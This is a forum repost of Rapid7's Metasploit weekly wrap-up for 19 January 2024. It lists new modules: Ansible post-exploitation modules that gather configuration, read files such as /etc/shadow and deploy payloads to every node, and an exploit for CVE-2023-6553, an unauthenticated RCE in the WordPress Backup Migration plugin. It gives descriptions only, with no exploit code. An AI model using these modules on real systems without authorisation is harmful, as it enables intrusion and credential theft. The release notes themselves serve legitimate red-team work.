National Cyber Warfare Foundation (NCWF) Forums


Metasploit Weekly Wrap-Up 01 19 24


0 user ratings
2024-01-19 21:41:51
milo
Red Team (CNA)

 - archive -- 

Unicode your way to a php payload and three modules to add to your playbook for Ansible


Our own jheysel-r7 added an exploit leveraging the fascinating tool of php filter chaining to prepend a payload using encoding conversion characters and h00die et. al. have come through and added 3 new



Unicode your way to a php payload and three modules to add to your playbook for Ansible


Metasploit Weekly Wrap-Up 01/19/24

Our own jheysel-r7 added an exploit leveraging the fascinating tool of php filter chaining to prepend a payload using encoding conversion characters and h00die et. al. have come through and added 3 new Ansible post modules to gather configuration information, read files, and deploy payloads. While none offer instantaneous answers across the universe, they will certainly help in red team exercises.


New module content (4)


Ansible Agent Payload Deployer (1 of 3 Ansible post modules)


Authors: h00die and n0tty

Type: Exploit

Pull request: #18627 contributed by h00die

Path: linux/local/ansible_node_deployer


Ansible Config Gather (2 of 3 Ansible post modules)


Author: h00die

Type: Post

Pull request: #18627 contributed by h00die

Path: linux/gather/ansible


Ansible Playbook Error Message File Reader (3 of 3 Ansible post modules)


Authors: h00die and rioasmara

Type: Post

Pull request: #18627 contributed by h00die

Path: linux/gather/ansible_playbook_error_message_file_reader


Description: This adds 3 post-exploitation modules for Ansible. The first one gathers information and configuration. The second exploits an arbitrary file read that enables an attacker to read the first line of a file (typically /etc/shadow), when the compromised account is configured with password-less sudo permissions. The last one is an exploit that can deploy a payload to all the nodes in the network.


WordPress Backup Migration Plugin PHP Filter Chain RCE


Authors: Nex Team, Valentin Lobstein, and jheysel-r7

Type: Exploit

Pull request: #18633 contributed by jheysel-r7

Path: multi/http/wp_backup_migration_php_filter


Description: This adds an exploit module that leverages an unauthenticated RCE in the WordPress plugin Backup Migration versions prior to 1.3.7. This vulnerability is identified as CVE-2023-6553. This also adds a library that implements a technique called PHP Filter Chaining which allows an attacker to prepend bytes to a string by continuously chaining character encoding conversion.


Enhancements and features (2)



  • #18596 from dwelch-r7 - Updates multiple SMB modules to work with the new upcoming SMB session type support. This beta functionality is currently behind a feature flag, and can be enabled with features set smb_session_type true.

  • #18682 from adfoster-r7 - Add tests for Msf::Exploit::Local module types to ensure that sysinfo will not break again in the future.


Bugs fixed (2)



  • #18655 from adfoster-r7 - Ensures the module will automatically be used when the hierarchical search functionality is enabled and only one module result is found.

  • #18710 from adfoster-r7 - Fixes an uninitialized constant Msf::Simple::Exploit::ExploitDriver exception that could sometimes occur when running Metasploit framework's payload modules.


Documentation added (1)



  • #18702 from Sh3llSp4wn - Updates the documentation for the private and public fields in lib/metasploit/framework/credential.rb to be correct.


You can always find more documentation on our docsite at docs.metasploit.com.


Missing rn-* label on Github (1)


PLEASE ADD RN-TAGS TO THESE PULL REQUESTS BEFORE RELEASING THE WRAP UP, AND RERUN THE WRAPUP SCRIPT



  • #18398 from errorxyz - Fixes deprecation warnings when running the auxiliary/admin/scada/modicon_password_recovery, auxiliary/scanner/lotus/lotus_domino_hashes, auxiliary/sniffer/psnuffle, exploits/unix/webapp/vbulletin_vote_sqli_exec exploit modules with a database connected.


Get it


As always, you can update to the latest Metasploit Framework with msfupdate

and you can get more details on the changes since the last blog post from

GitHub:



If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.

To install fresh without using git, you can use the open-source-only Nightly Installers or the

commercial edition Metasploit Pro




Source: Rapid7
Source Link: https://blog.rapid7.com/2024/01/19/metasploit-weekly-wrap-up-01-19-24/


Comments
new comment
Nobody has commented yet. Will you be the first?
 
Forum
Red Team (CNA)



Copyright 2012 through 2024 - National Cyber Warfare Foundation - All rights reserved worldwide.